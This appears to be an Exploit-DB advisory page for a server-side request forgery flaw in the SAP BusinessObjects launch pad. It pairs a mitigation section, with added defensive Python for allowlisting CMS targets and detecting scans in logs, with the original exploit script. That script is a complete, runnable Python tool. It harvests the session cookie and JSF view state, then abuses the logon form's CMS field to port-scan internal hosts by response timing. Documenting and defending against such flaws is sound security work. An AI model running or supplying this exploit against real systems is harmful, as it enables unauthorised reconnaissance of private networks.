Vendor: BusinessObjects
By: Ahmad Mahfouz
CVSS: 8.8 (HIGH)
CWE: 918 (SSRF)
Product Name: BusinessObjects
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2017

SAP BusinessObjects launch pad SSRF

A design error in the SAP BusinessObjects launch pad allows server-side request forgery (SSRF). An attacker can use the vulnerability to scan internal networks and access sensitive information.

Mitigation:

Validate the user-supplied CMS host and port against the servers the application is actually configured to use, rather than connecting to whatever the form carries, and restrict the application server's outbound access to internal networks.
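The two measures just named, as an added Python 3 example written for this page (not SAP's code and not the advisory author's): an exact allowlist check for the CMS host:port value carried by the logon form, and a detector, run over constructed log lines, that flags a client cycling through many non-configured targets, which is how the per-port timing probes in the script below would appear in server logs. The allowlist contents, the default port 6400 and the log line format are assumptions.

```python
# Added example for this page; not SAP's code and not the advisory author's.
# Assumed: the configured CMS servers, the default port, and the log line format.
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical: the only CMS servers this deployment is configured to use.
CMS_ALLOWLIST = {
    ("cms01.internal.example", 6400),
    ("cms02.internal.example", 6400),
}
DEFAULT_CMS_PORT = 6400  # assumed default when the user omits the port


def parse_host_port(value, default_port=DEFAULT_CMS_PORT):
    """Split "host:port" or "[v6addr]:port" into (host, port); ValueError on junk."""
    value = value.strip()
    if not value:
        raise ValueError("empty target")
    if value.startswith("["):
        close = value.find("]")
        if close < 0:
            raise ValueError("unterminated IPv6 literal")
        host, rest = value[1:close], value[close + 1:]
        if rest and not rest.startswith(":"):
            raise ValueError("unexpected text after IPv6 literal")
        port_str = rest[1:]
    elif value.count(":") > 1:
        raise ValueError("bare IPv6 literal must be bracketed")
    else:
        host, _, port_str = value.partition(":")
    if not host:
        raise ValueError("missing host")
    if port_str == "":
        return host.lower(), default_port
    if not port_str.isdigit() or not 1 <= int(port_str) <= 65535:
        raise ValueError("bad port %r" % port_str)
    return host.lower(), int(port_str)


def validate_cms_target(value):
    """Return (host, port) if it names a configured CMS; raise ValueError otherwise.

    The pair must match an allowlist entry exactly: no other hosts, no other
    ports. That removes the attacker's control over where the server connects,
    which is the root of the SSRF and of the port scan built on top of it.
    """
    host, port = parse_host_port(value)
    if (host, port) not in CMS_ALLOWLIST:
        raise ValueError("%s:%d is not a configured CMS" % (host, port))
    return host, port


def is_valid_cms_target(value):
    """Accept/reject wrapper for callers that do not need the reason."""
    try:
        validate_cms_target(value)
        return True
    except ValueError:
        return False


# Constructed sample log: one record per logon POST, "timestamp client CMS-field".
SAMPLE_LOG = """\
2017-11-08T10:00:00 203.0.113.5 cms01.internal.example:6400
2017-11-08T10:00:01 203.0.113.5 10.0.0.8:22
2017-11-08T10:00:12 203.0.113.5 10.0.0.8:80
2017-11-08T10:00:13 203.0.113.5 10.0.0.8:443
2017-11-08T10:00:24 203.0.113.5 10.0.0.8:3389
2017-11-08T10:00:25 203.0.113.5 10.0.0.8:8080
2017-11-08T10:00:30 198.51.100.7 cms01.internal.example:6400
"""


def detect_cms_scanning(log_text, window=timedelta(minutes=5), threshold=3):
    """Map client -> count for clients that posted >= threshold distinct
    non-configured CMS targets within one window: one client walking through
    host:port values that are not real CMS servers is the probing pattern."""
    rejected = defaultdict(list)  # client -> [(timestamp, target)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_text, client, cms = line.split()
        if not is_valid_cms_target(cms):
            ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%S")
            rejected[client].append((ts, cms))
    flagged = {}
    for client, events in rejected.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            targets = {tgt for ts, tgt in events[i:] if ts - t0 <= window}
            if len(targets) >= threshold:
                flagged[client] = len(targets)
                break
    return flagged


if __name__ == "__main__":
    for candidate in ("cms01.internal.example:6400", "10.0.0.8:22", "[::1]:6400"):
        verdict = "accepted" if is_valid_cms_target(candidate) else "rejected"
        print("%-30s %s" % (candidate, verdict))
    print("clients flagged for CMS scanning:", detect_cms_scanning(SAMPLE_LOG))
```

The validator deliberately compares the whole (host, port) pair rather than the host alone: a port-only check would still let the CMS field steer the backend connection to arbitrary ports on a configured host, which is exactly what a timing-based port scan needs. The detector counts distinct rejected targets per client, so a user who mistypes a server name once is not flagged while a sweep across ports is.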

Exploit-DB raw data:

# Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage: www.unixawy.com
# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack

#!/usr/bin/env python
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : sblpta.py http://path.faces targetIP targetPort
import urllib2
import urllib
import ssl
from datetime import datetime
import sys

if len(sys.argv) != 4:
   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
   sys.exit(1)

url = sys.argv[1]
targetIP = sys.argv[2]
targetPort = sys.argv[3]
targetHostIP = "%s:%s" % (targetIP, targetPort)
print "\r\n"
print "[*] SAP BusinessObjects Timing Attack"
headers = {'User-Agent': 'Mozilla/5.0'}
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)

# Fetch the logon page to obtain the session cookie and the JSF view state
try:
   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP BusinessObjects %s" % url
except Exception:
   print "[-] Failed to connect to SAP BusinessObjects %s" % url
   print "[*] SAP BusinessObjects link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
   sys.exit(2)

resheaders = page.info()
cookie = resheaders.dict['set-cookie']
content = page.readlines()

sfview = None
for line in content:
   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"

if not sfview:
   print "[-] Failed to get java faces dynamic value, are you sure you extracted the java faces form from the link ??"
   sys.exit(3)

# The CMS field of the logon form names the backend host:port the server connects to
formdata = {"_id0:logon:CMS": targetHostIP,
            "_id0:logon:USERNAME": "",
            "_id0:logon:PASSWORD": "",
            "com.sun.faces.VIEW": sfview,
            "_id0": "_id0"
            }

data_encode = urllib.urlencode(formdata)
start = datetime.now()
print "[*] Testing Timing Attack %s" % start
request = urllib2.Request(url, data_encode)
request.add_header('Cookie', cookie)
response = urllib2.urlopen(request)
end = datetime.now()
the_page = response.read()

# Response time separates an open port (slow) from a closed one (fast)
if "FWM" in the_page:
   elapsedTime = end - start
   if elapsedTime.total_seconds() >= 10:
      print "[*] Port %s is Open, Gotcha !!! " % targetPort
   else:
      print "[*] Port %s is Closed , we die fast" % targetPort
elif "FWC" in the_page:
   print "[-] error login expired"
   sys.exit(10)